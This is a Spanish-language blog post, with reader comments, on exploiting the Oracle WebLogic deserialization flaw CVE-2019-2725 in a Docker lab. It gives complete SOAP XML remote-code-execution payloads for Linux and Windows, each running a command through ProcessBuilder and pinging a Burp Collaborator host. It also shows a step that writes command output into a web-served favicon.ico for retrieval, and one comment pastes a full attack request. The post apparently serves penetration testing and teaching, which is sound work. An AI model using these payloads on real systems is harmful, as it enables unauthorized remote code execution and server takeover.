jueves, 9 de mayo de 2019

WebLogic CVE-2019-2725/CNVD-C-2019-48814


Instalación de maquina vulnerable:

1.- sudo docker pull vulhub/weblogic

2.- sudo docker run -dit -p 7001:7001 vulhub/weblogic

Descripcion:

Oracle WebLogic Server es un middleware para implementar y administrar aplicaciones web. Un atacante podría enviar una solicitud a un servidor WebLogic, que luego se comunicaría con un host malicioso para completar la solicitud, abriendo el servidor WebLogic a un ataque RCE.

Impacto:

Los ataques exitosos de esta vulnerabilidad pueden resultar en la toma de control de Oracle WebLogic Server.

URLs Posibles:

/_async/AsyncResponseService
/_async/AsyncResponseServiceHttps

/_async/AsyncResponseServiceJms

Vector de ataque para Linux:

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing" xmlns:asy="http://www.bea.com/async/AsyncResponseService">
        <soapenv:Header>
        <wsa:Action>xx</wsa:Action>
        <wsa:RelatesTo>xx</wsa:RelatesTo>
        <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
        <void class="java.lang.ProcessBuilder">
        <array class="java.lang.String" length="3">
        <void index="0">
        <string>/bin/bash</string>
        </void>
        <void index="1">
        <string>-c</string>
        </void>
        <void index="2">
        <string>ping xxx.burpcollaborator.net</string>
        </void>
        </array>
        <void method="start"/></void>
        </work:WorkContext>
        </soapenv:Header>
        <soapenv:Body>
        <asy:onAsyncDelivery/>
        </soapenv:Body></soapenv:Envelope>

Vector de ataque para windows:

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing" xmlns:asy="http://www.bea.com/async/AsyncResponseService">
        <soapenv:Header>
        <wsa:Action>xx</wsa:Action>
        <wsa:RelatesTo>xx</wsa:RelatesTo>
        <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
        <void class="java.lang.ProcessBuilder">
        <array class="java.lang.String" length="3">
        <void index="0">
        <string>cmd</string>
        </void>
        <void index="1">
        <string>/c</string>
        </void>
        <void index="2">
        <string>ping xxx.burpcollaborator.net</string>
        </void>
        </array>
        <void method="start"/></void>
        </work:WorkContext>
        </soapenv:Header>
        <soapenv:Body>
        <asy:onAsyncDelivery/>
        </soapenv:Body></soapenv:Envelope>


Pasos a Realizar:

Se ejecutaron pruebas de seguridad con los dos vectores de ataques para windows y linux en todos los puntos finales (URLs posibles) posibles en la aplicacion.

1.- Enviar los payloads a todos los posibles puntos finales de la aplicacion y ver si burp collaborator atrapa el ping enviado.



2.- En caso de responder y ser vulnerable, utilizar el siguiente comando entre <string>tucomando</string>


ls -la > servers/AdminServer/tmp/_WL_internal/bea_wls9_async_response/8tpkys/war/favicon.ico


3.- Accedemos a la siguiente ruta: http://HOSTVULNERABLE/_async/favicon.ico


Solución:


Actualizar para aplicar el parche de esta vulnerabilidad.

2 comentarios:

  1. HTTP/1.1 500 Server Error

    Server: ""

    Date: Mon, 17 Jun 2019 12:06:52 GMT

    Content-type: text/xml; charset="utf-8"

    X-Powered-By: Servlet/2.4 JSP/2.0

    Connection: close



    soapenv:Serverweblogic.xml.saaj.TextImpljava.lang.ClassCastException: weblogic.xml.saaj.TextImpl


    Me tira este error, la petición es esta:

    POST /_async/AsyncResponseService HTTP/1.1

    Host: redacted

    User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:67.0) Gecko/20100101 Firefox/67.0

    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

    Accept-Language: en-US,en;q=0.5

    Accept-Encoding: gzip, deflate

    DNT: 1

    Connection: close

    Cookie: JSESSIONID=redacted

    Upgrade-Insecure-Requests: 1

    Pragma: no-cache

    Cache-Control: no-cache

    Content-Type: text/xml

    Content-Length: 960







    xx

    xx









    /bin/bash





    -c





    ping 8w59wb1i6vcf3oslmah27k8ie9k18q.burpcollaborator.net















    ResponderEliminar
  2. Buff se fue a la mierda el formato del mensaje por los tags XML jajaja. Vaya fail. Gracias por el artículo de todas maneras, muy bueno.

    ResponderEliminar